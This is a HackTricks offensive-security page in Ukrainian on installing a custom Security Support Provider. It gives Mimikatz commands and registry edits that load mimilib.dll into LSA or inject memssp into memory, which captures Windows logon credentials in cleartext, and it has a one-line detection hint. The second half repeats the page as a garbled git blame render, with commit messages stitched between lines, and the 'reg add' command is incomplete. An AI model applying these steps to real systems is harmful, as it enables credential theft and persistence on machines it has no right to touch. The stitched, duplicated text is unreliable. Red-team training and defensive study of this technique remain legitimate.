hacktricks/windows-hardening/active-directory-methodology/custom-ssp.md

<details>

<summary><strong>Вивчайте хакінг AWS від нуля до героя з</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>

Інші способи підтримки HackTricks:

* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)!
* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com)
* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family)
* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**.

</details>


## Власний SSP

[Дізнайтеся, що таке SSP (Постачальник підтримки безпеки) тут.](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\
Ви можете створити **власний SSP**, щоб **захопити** в **чистому тексті** облікові **дані**, які використовуються для доступу до машини.

### Mimilib

Ви можете використовувати бінарний файл `mimilib.dll`, наданий Mimikatz. **Це буде реєструвати всі облікові дані в чистому тексті всередині файлу.**\
Розмістіть dll у `C:\Windows\System32\`\
Отримайте список існуючих пакунків безпеки LSA:

{% code title="attacker@target" %}
```bash
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"

HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
```
Додайте `mimilib.dll` до списку постачальників безпеки (Security Packages):
```powershell
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
```
І після перезавантаження всі облікові дані можна знайти у відкритому вигляді в `C:\Windows\System32\kiwissp.log`

### У пам'яті

Ви також можете впровадити це безпосередньо у пам'ять за допомогою Mimikatz (зверніть увагу, що це може бути трохи нестабільним/не працювати):
```powershell
privilege::debug
misc::memssp
```
Це не виживе перезавантажень.

### Заходи запобігання

Подія ID 4657 - Аудит створення/зміни `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
+								<details>
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								<summary><strong>Вивчайте хакінг AWS від нуля до героя з</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								Інші способи підтримки HackTricks:
-												GitBook: [#3560] No subject

											
										
										
											2022-10-05 00:11:28 +00:00
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								* Якщо ви хочете побачити **рекламу вашої компанії на HackTricks** або **завантажити HackTricks у форматі PDF**, перевірте [**ПЛАНИ ПІДПИСКИ**](https://github.com/sponsors/carlospolop)!
 								* Отримайте [**офіційний PEASS & HackTricks мерч**](https://peass.creator-spring.com)
 								* Відкрийте для себе [**Сім'ю PEASS**](https://opensea.io/collection/the-peass-family), нашу колекцію ексклюзивних [**NFT**](https://opensea.io/collection/the-peass-family)
 								* **Приєднуйтесь до** 💬 [**групи Discord**](https://discord.gg/hRep4RUj7f) або [**групи telegram**](https://t.me/peass) або **слідкуйте** за нами на **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
 								* **Поділіться своїми хакерськими трюками, надсилайте PR до** [**HackTricks**](https://github.com/carlospolop/hacktricks) **і** [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) **репозиторіїв на GitHub**.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												GitBook: [#3560] No subject

											
										
										
											2022-10-05 00:11:28 +00:00
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								## Власний SSP
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								[Дізнайтеся, що таке SSP (Постачальник підтримки безпеки) тут.](../authentication-credentials-uac-and-efs.md#security-support-provider-interface-sspi)\
 								Ви можете створити **власний SSP**, щоб **захопити** в **чистому тексті** облікові **дані**, які використовуються для доступу до машини.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												GitBook: [#3560] No subject

											
										
										
											2022-10-05 00:11:28 +00:00
+								### Mimilib
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								Ви можете використовувати бінарний файл `mimilib.dll`, наданий Mimikatz. **Це буде реєструвати всі облікові дані в чистому тексті всередині файлу.**\
 								Розмістіть dll у `C:\Windows\System32\`\
 								Отримайте список існуючих пакунків безпеки LSA:
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
 								{% code title="attacker@target" %}
 								```bash
 								PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
 								HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								Security Packages    REG_MULTI_SZ    kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								Додайте `mimilib.dll` до списку постачальників безпеки (Security Packages):
-												a

											
										
										
											2024-02-08 03:08:28 +00:00
+								```powershell
 								reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								```
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								І після перезавантаження всі облікові дані можна знайти у відкритому вигляді в `C:\Windows\System32\kiwissp.log`
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								### У пам'яті
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								Ви також можете впровадити це безпосередньо у пам'ять за допомогою Mimikatz (зверніть увагу, що це може бути трохи нестабільним/не працювати):
-												a

											
										
										
											2024-02-08 03:08:28 +00:00
+								```powershell
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
+								privilege::debug
 								misc::memssp
 								```
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								Це не виживе перезавантажень.
-												GitBook: [master] 351 pages and 442 assets modified
											
										
										
											2020-07-15 15:43:14 +00:00
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								### Заходи запобігання
-												GitBook: [#3560] No subject

											
										
										
											2022-10-05 00:11:28 +00:00
-												Translated to Ukranian

											
										
										
											2024-03-29 18:49:46 +00:00
+								Подія ID 4657 - Аудит створення/зміни `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`